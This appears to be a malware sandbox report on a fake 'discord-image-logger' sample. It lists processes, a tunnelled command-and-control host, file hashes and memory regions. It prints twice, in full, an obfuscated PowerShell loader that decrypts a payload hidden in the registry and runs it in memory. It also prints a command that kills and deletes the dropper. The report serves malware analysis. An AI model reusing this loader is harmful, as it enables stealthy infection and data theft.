$VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5a7f65c1-f9c3-44a4-8391-a9a72e3e432f}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3468).WaitForExit();[System.Threading.Thread]::Sleep(5000); function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{9bc9b654-e370-41d7-af81-0f170909ea7c}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{7df56ac6-ef15-4dce-a0aa-cc98d4eccb5b}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{9c52700a-0c19-4ada-a17b-5b057b9b4c5a}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 nervous-water-68160.pktriot.net udp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 8.8.8.8:53 nervous-water-68160.pktriot.net udp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 8.8.8.8:53 nervous-water-68160.pktriot.net udp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp
US 165.227.31.192:22400 nervous-water-68160.pktriot.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/2176-6-0x00007FF927B93000-0x00007FF927B95000-memory.dmp

memory/2176-7-0x00000271556A0000-0x00000271556C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eorjmwmq.jfd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2176-17-0x00007FF927B90000-0x00007FF928651000-memory.dmp

memory/2176-18-0x00007FF927B90000-0x00007FF928651000-memory.dmp

memory/2176-19-0x000002713D400000-0x000002713D42C000-memory.dmp

memory/2176-20-0x00007FF946210000-0x00007FF946405000-memory.dmp

memory/2176-21-0x00007FF9442C0000-0x00007FF94437E000-memory.dmp

memory/2176-22-0x00007FF927B93000-0x00007FF927B95000-memory.dmp

memory/2176-24-0x0000027160320000-0x00000271612DC000-memory.dmp

memory/2176-25-0x00007FF927B90000-0x00007FF928651000-memory.dmp

memory/2176-23-0x00007FF927B90000-0x00007FF928651000-memory.dmp

memory/2176-27-0x00000271612E0000-0x00000271615C8000-memory.dmp

memory/2176-28-0x00000271615D0000-0x0000027161868000-memory.dmp

memory/2176-31-0x00007FF946210000-0x00007FF946405000-memory.dmp

memory/2176-30-0x000002713D430000-0x000002713D43C000-memory.dmp

memory/3932-35-0x0000000140000000-0x0000000140004000-memory.dmp

memory/3932-33-0x0000000140000000-0x0000000140004000-memory.dmp

memory/2176-29-0x0000027157CF0000-0x0000027157D48000-memory.dmp

memory/3468-55-0x00007FF946210000-0x00007FF946405000-memory.dmp

memory/3468-56-0x00007FF9442C0000-0x00007FF94437E000-memory.dmp

memory/3468-57-0x000001497C610000-0x000001497CA10000-memory.dmp

memory/3468-58-0x000001497CA10000-0x000001497D186000-memory.dmp

memory/3468-59-0x000001497D190000-0x000001497D5AA000-memory.dmp

memory/3468-60-0x00007FF946210000-0x00007FF946405000-memory.dmp

memory/3468-66-0x000001497DBE0000-0x000001497DC30000-memory.dmp

memory/3468-67-0x000001497DCF0000-0x000001497DDA2000-memory.dmp

memory/3468-68-0x000001497DF80000-0x000001497E142000-memory.dmp

memory/3468-79-0x00007FF946210000-0x00007FF946405000-memory.dmp

memory/3468-78-0x000001497DB90000-0x000001497DBBE000-memory.dmp

memory/1700-82-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1700-83-0x00007FF946210000-0x00007FF946405000-memory.dmp

memory/1700-84-0x00007FF9442C0000-0x00007FF94437E000-memory.dmp

memory/1700-81-0x0000000140000000-0x0000000140029000-memory.dmp

memory/3468-80-0x00007FF9442C0000-0x00007FF94437E000-memory.dmp

C:\Windows\System32\ucrtbased.dll

MD5 7873612dddd9152d70d892427bc45ef0
SHA1 ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256 203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512 d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

C:\Windows\System32\vcruntime140d.dll

MD5 a366d6623c14c377c682d6b5451575e6
SHA1 a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA256 7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512 cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

C:\Windows\System32\vcruntime140_1d.dll

MD5 9ef28981adcbf4360de5f11b8f4ecff9
SHA1 219aaa1a617b1dfa36f3928bd1020e410666134f
SHA256 8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512 ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

memory/1700-94-0x0000000140000000-0x0000000140029000-memory.dmp

memory/376-108-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/964-111-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/404-115-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/1292-138-0x0000019E12A60000-0x0000019E12A87000-memory.dmp

memory/1180-136-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/1180-135-0x0000024341510000-0x0000024341537000-memory.dmp

memory/1172-133-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/1172-132-0x0000019E9C9B0000-0x0000019E9C9D7000-memory.dmp

memory/1124-130-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/1124-129-0x0000023E0BAA0000-0x0000023E0BAC7000-memory.dmp

memory/1040-127-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/1040-126-0x000001D1B2360000-0x000001D1B2387000-memory.dmp

memory/1032-124-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/1032-123-0x0000029C5C1C0000-0x0000029C5C1E7000-memory.dmp

memory/404-114-0x00000148634D0000-0x00000148634F7000-memory.dmp

memory/964-110-0x000002553DF20000-0x000002553DF47000-memory.dmp

memory/376-107-0x000001DBBEB00000-0x000001DBBEB27000-memory.dmp

memory/620-105-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/620-104-0x000001A746550000-0x000001A746577000-memory.dmp

memory/672-100-0x00007FF906290000-0x00007FF9062A0000-memory.dmp

memory/672-99-0x000002535DE30000-0x000002535DE57000-memory.dmp

memory/620-97-0x000001A7464C0000-0x000001A7464E1000-memory.dmp

memory/2176-853-0x00007FF93AAE3000-0x00007FF93AAE4000-memory.dmp

memory/2176-855-0x00007FF927B90000-0x00007FF928651000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 f2e70b28847abdf1dd9f9ac2c6f6a112
SHA1 6a35f0e9eb2efd326586240e50255e5b1d8aa698
SHA256 7f9f73de894d89d94a6edb36068ad0ed82fda10cc31ce7897b1da1458e4e31f4
SHA512 eed9033f3dd627ab64e8156c6c7ca7befd9b452fd123a3c60ca75c2c059fc5e55d8536b6e5c70d08975ad23d4786b3f42d00a76935317867ba1c76de9aef2b92

Analysis: behavioral8

Detonation Overview

Submitted

2025-02-24 03:58

Reported

2025-02-24 04:02

Platform

win10v2004-20250217-en

Max time kernel

147s

Max time network

151s

Command Line

